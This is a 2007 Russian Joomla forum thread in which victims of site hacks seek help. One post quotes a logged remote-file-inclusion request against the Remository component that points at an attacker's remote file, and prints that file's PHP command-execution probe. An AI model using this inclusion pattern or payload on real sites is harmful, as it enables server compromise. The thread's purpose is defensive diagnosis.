Безопасность сайта на CMS Joomla!

Тема в разделе "Вопросы безопасности", создана пользователем xarakiry, 18.08.2007.

  1. Offline

    xarakiry Недавно здесь

    Регистрация:
    07.08.2007
    Сообщения:
    34
    Симпатии:
    0
    Народ...может я не в ту категорию запостил эту тему...но вот я столкнулся с проблемой...Уже 2 моих саята были подвергнуты атаке хакеров, и оба подобными способами...я просмотрел логи сервера... своего хостинга..через с панель и вот что обнаружл...

    http://название сайта/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://другой сайт /файл.txt?

    Вот меня интерисует...как защитить свой сайт..и где я могу прочитать по безопасности джумла...
     
  2.  
  3. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Безопасность

    Старо. Этому багу около года уже.
    Обнови Remository, Joomla и выключи register_globals и её эмуляцию

    Раздел Безопасность на joomla-docs.ru
     
  4. Offline

    xarakiry Недавно здесь

    Регистрация:
    07.08.2007
    Сообщения:
    34
    Симпатии:
    0
    Ответ: Безопасность сайта на CMS Joomla!

    Эмуляция Joomla! Register Globals: OFF
    Register Globals: OFF

    У меня всё вырублено..а ремосистори стоял последний..я его с офф сайта скачал... ща почитаю мануал по безопасности...еси что обращусь...спасибо большое за ссылочку.
     
  5. artlebsak
    Offline

    artlebsak Папа Джум ™

    Регистрация:
    13.04.2007
    Сообщения:
    517
    Симпатии:
    15
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    А какой номер у версии ReMosItory, которая предполагается последней?
     
  6. Offline

    xarakiry Недавно здесь

    Регистрация:
    07.08.2007
    Сообщения:
    34
    Симпатии:
    0
    Ответ: Безопасность сайта на CMS Joomla!

    у меня

    3,42 ща пропатчил джумлу на 1,0,13 подожду до завтра..погляжу на логи..

    кстати..а мне хотелось бы узнать...что именно взломщик получает через эту уязвимость... что я писал выше..я проходил по ссылкке и открывается текстовый документ... хотелось бы узнать какие перспективы перед ним открываются...
     
  7. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    т.е. только атаке? Последствия то есть какие-нибудь?
     
  8. artlebsak
    Offline

    artlebsak Папа Джум ™

    Регистрация:
    13.04.2007
    Сообщения:
    517
    Симпатии:
    15
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    да, интересный вопрос - в логах просто попытка взлома или есть последствия удачной попытки взлома?
     
  9. Offline

    xarakiry Недавно здесь

    Регистрация:
    07.08.2007
    Сообщения:
    34
    Симпатии:
    0
    Ответ: Безопасность сайта на CMS Joomla!

    Ну тот сайт который был первый взломан...я даже не сразу чухнул в чём дело...стал грешить на хостинг..что они что то настраивают...потом поглядел логи...тоже самое... тот сайт сломали... но там я не ставил пароль через спанель на администрирование... Не думал что тот сайт кому то нужен будет... что бы его ещё ломать... а этот мой более посещаемый...я с начала самого после установки запаролил... Но несмотря на это... в первый раз...после таки у меня перестала работать SEO ...я опять стал грешить на хостинг что мол у них там что то с mod_rewrite потом решил посмотреть логи и наткнулся на тоже самое что было на том моём сайте...

    Вот за сегодня уже 3 попытки тоже самого что я писал выше..но сайт вроде пока работает... .htaccess у меня есть .. я блокировал домены и айпи с которых производилась эта вещь..но я знаю это капля в море... сменить айпи не трудно... прочитал мануал по безопасности... вроде всё что там написано у меня уже есть... я вот решил может выложу вам код того что бывает в этих текстовых документах..может вы поглядите и поставите диагноз..ато ломают ломают..так ведь и поломать могут..

    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;


    http://www.isslimited.net/id.txt? это один из тех доменов которые бывают в логах...
     
  10. Offline

    unix Недавно здесь

    Регистрация:
    12.02.2007
    Сообщения:
    11
    Симпатии:
    0
    Ответ: Безопасность сайта на CMS Joomla!

    Joomla.Org опять сломали уже второй раз за неделю, если уж разаботчик не может защитить себя что тогда говорить про обычных юзеров, зато исправно списуют все взломы на сторонние компонненты,
    вы наверно сажете "джумла безопасна, просто компоненты стороние не ставте"
    вобщем не вериться в это, или Joomla.Org ставит непроверенные компоненты?
    по большому счету джумла всего лиш платформа для сторонних компонентов, и наверно ни один сайт не использует "чистую" джумлу.

    сори если не туда запостил, не создавать же отдельную тему,

    p.s.
    Это не наезд на джумлу, просто поймите пользователя который узнает сначала что по всей росии бмбят сторонние компоненнты, потом ломают главный оффсайт джумлы чуть не каждый день, тут задумаешся :(
     
  11. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 108
    Симпатии:
    159
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    Нет систем которые нельзя взломать. Это вопрос времени и прилогаемых сил.
    Любой сайт подвержен взлому, некоторые популярные cms, удостаиваются, особого внимания хакеров, поэтому и уязвиности в них находят быстрее. И ими пользуются.
    Например одна из причин бажности IE -это его популярность : ))
    Все ИМХО. Джумла - форева!
     
  12. Offline

    -=Luc!fer=- Недавно здесь

    Регистрация:
    24.09.2007
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    А как лечить? Гугл постоянно банит, пользователи не могут войти, что можно предпринять?
     
  13. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    Лучшее средство от взлома - сидеть дома и не высовываться в интернет, и уж тем более не делать сайтов. Инструмент здесь не важен, т.к. ломают всё, просто крики о взломе Joomla громче.
     
  14. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 751
    Симпатии:
    113
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    ну ломают и хорошо. я бы нервничал если бы не ломали- тогда жди беды)
    а так все дыры известны, способы известны, бек апы готовы, хостер хороший друг. Ломанут- закроем, исправим, соберем информацию о том кто это сделал. На войне как на войне)

    Чего бояться то? Все кричат взлом взлом. Как будто вам никто не поможет и не посоветует после взлома. Мы посоветуем, а если башка есть на плечах сайт после взлома еще лучше станет. Если бы мы жили в идеальном мире то было бы неинтересно.

    Я вообще больше опасаюсь не взлома Joomla, а физического уничтожения сервака) ДДОСа, хотя бек апы сайтов у меня лежат и на жестком и на дисках. Так что при любом раскладе сайт останется жив) А при многократных взломах одного сайта, те кто это делают рискуют попасться. Причем серьезно.
     
    Последнее редактирование: 24.09.2007
  15. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    За 2 года не было сломано ни одного моего сайта (личные, находятся на 3х разных хостингах), тьфу, тьфу, тьфу. Что я не так делаю?
     
  16. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 751
    Симпатии:
    113
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    а ты поставь дырявый компонент)))) для разнообразия, а еще лучше парочку.
     
  17. Offline

    Djons Недавно здесь

    Регистрация:
    28.11.2005
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    Инфа к размышлению для ленивых.
    В общем позавчера взломали у меня несколько сайтов. Взлом был 25.09 в 19:17
    Во всех index.html и index.php был добавлен скрипт и ифрейм через который троян лез. На конфе joomlaforum.ru была инфа, что это через FTP троян делает, но не похоже. Т.к. в моём FTP клиенте около 10 сайтов. Взломаны были 6. Скорее всего взломаны были сайты на джумле версий ниже 1.13 Ну и конечно настройки безопасности, о которых выше говорилось. Каюсь - ленив иногда обновлятся вовремя и т.д.
     
  18. Offline

    -=Luc!fer=- Недавно здесь

    Регистрация:
    24.09.2007
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    У меня сайт на 1.13, взломали до того как проапдейтил. Тоже самое с индексами. Пока что поиски залитого скрипта результтов не дали.
    Все индексы на хостинге поражены.

    ЗЫ ну очень не хочется сносить сайт и заново всё строить.
     
  19. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 108
    Симпатии:
    159
    Пол:
    Мужской
    Ответ: Безопасность сайта на CMS Joomla!

    -=Luc!fer=-, для этого должны быть свежие бекапы, если вы их не делали, это ваша большая беда и урок ;)
     
  20. Offline

    Maveric Гость

    Ответ: Безопасность сайта на CMS Joomla!

    Народ подскажите где взять обновление для русской версии 1.0.13
    я вообще находил, но непонятно для какой версии и ссылки на инструкции на англоязычные сайты.
    Что-то немогу найти обновление 1.0.13 - 1.0.14 для русской и документацию по обновлению на русском
     
  21. Offline

    Adelion Недавно здесь

    Регистрация:
    14.03.2007
    Сообщения:
    1
    Симпатии:
    0
    Ответ: Безопасность сайта на CMS Joomla!

    Аналогичная беда.
    Причем уже который раз ставлю Джумлу заново и уже который раз сайт ломают :( За-дол-ба-ло!

    Что это может быть? И как избавиться? Никаккие нафиг бэкапы не помогают!
     

Поделиться этой страницей

Загрузка...